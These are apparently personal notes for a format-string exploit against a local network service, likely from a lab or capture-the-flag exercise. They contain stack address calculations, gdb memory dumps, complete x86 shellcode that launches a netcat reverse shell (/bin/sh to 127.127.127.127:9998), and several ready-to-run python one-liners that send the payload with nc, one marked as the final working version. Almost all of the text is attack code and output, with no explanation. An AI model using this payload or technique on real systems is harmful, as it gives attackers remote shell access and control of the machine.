possibility epi (iniside of snprintf, so may not work) : 0xbffff1c4
other : 0xbffff1c4 (also)
other : 0xbffff1a4
other : 0xbffff1a4 (also)
other : 0xbffff1e4
other : 0xbffff284
other : 0xbffff354 (ret 0x14)
other : 0xbffff3b4
other : 0xbffff27c
other : 0xbffff27c (also)
other : 0xbfffec8c
other : 0xbfffeccc
other : 0xbfffeccc (also)
other : 0xbffff27c (vfprintf ret)
other : 0xbffff3cc (snprintf ret)

start of input : 0xbffff3ec
address of snprintf ret : 0xb7e76917
(address on stack to overwrite : 0xbffff3cc)


so i have to write 0xbffff3ec + 8 at 0xbffff3cc = 0xbffff3f4

f3f4 = 62452
bfff = 49151

shellcode:
\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x38
(length : 110)



0xbffff3ce + 0xbffff3cc + shellcode
4 + 4 + 110 = 118
49151 - 118 = 49033 - 2 = 49031
62452 - 49151 = 13301 - 2 = 13299

\xce\xf3\xff\xbf\xcc\xf3\xff\xbf

'\xce\xf3\xff\xbf\xcc\xf3\xff\xbf' + '\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x38' + '%49033d%5$n' + '%13301d%6$n'

working with gdb:
python -c "print '\xce\xf3\xff\xbf\xcc\xf3\xff\xbf' + '\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x38' + '\%49031x\%5\$hn' + '\%13299x\%6\$hn'" | nc localhost 56024


___
decal (+0x10 (decimal 16)):

input start is 0xbffff3fc
so start of shellcode is 0xbffff404
and overwrite at 0xbffff3dc

f404 = 62468
bfff = 49151

49151 - 118 = 49033 - 2 = 49031
62468 - 49151 = 13317 - 2 = 13315

python -c "print '\xde\xf3\xff\xbf\xdc\xf3\xff\xbf' + '\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x38' + '\%49031x\%5\$hn' + '\%13315x\%6\$hn'" | nc localhost 56024


final good one :
python -c "print '\xfe\xf3\xff\xbf\xfc\xf3\xff\xbf' + '\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x38' + '\%49031x\%5\$hn' + '\%13347x\%6\$hn'" | nc localhost 56032


correct, but still offset, maybe because of env -i or full path given at execution



0xbffff7ec:	0xbffff3ce	0xbffff3cc	0x315e3ceb	0x0b4688c0
0xbffff7fc:	0x880e4688	0x46881646	0x2b468826	0x8d2c7689
0xbffff80c:	0x5e890c5e	0x0f5e8d30	0x8d345e89	0x5e89175e
0xbffff81c:	0x275e8d38	0x893c5e89	0x0bb04046	0x4e8df389
0xbffff82c:	0x40568d2c	0xbfe880cd	0x2fffffff	0x2f6e6962
0xbffff83c:	0x6374656e	0x2d237461	0x622f2365	0x732f6e69
0xbffff84c:	0x32312368	0x32312e37	0x32312e37	0x32312e37
0xbffff85c:	0x39392337


0xbffff3ec:	0xbffff3ce	0xbffff3cc	0x315e3ceb	0x0b4688c0
0xbffff3fc:	0x880e4688	0x46881646	0x2b468826	0x8d2c7689
0xbffff40c:	0x5e890c5e	0x0f5e8d30	0x8d345e89	0x5e89175e
0xbffff41c:	0x275e8d38	0x893c5e89	0x0bb04046	0x4e8df389
0xbffff42c:	0x40568d2c	0xbfe880cd	0x2fffffff	0x2f6e6962
0xbffff43c:	0x6374656e	0x2d237461	0x622f2365	0x732f6e69
0xbffff44c:	0x32312368	0x32312e37	0x32312e37	0x32312e37
0xbffff45c:	0x39392337	0x34253839	0x33333039	0x25352578
0xbffff46c:	0x30333331	0x36257831	0x0000000a	0x00000000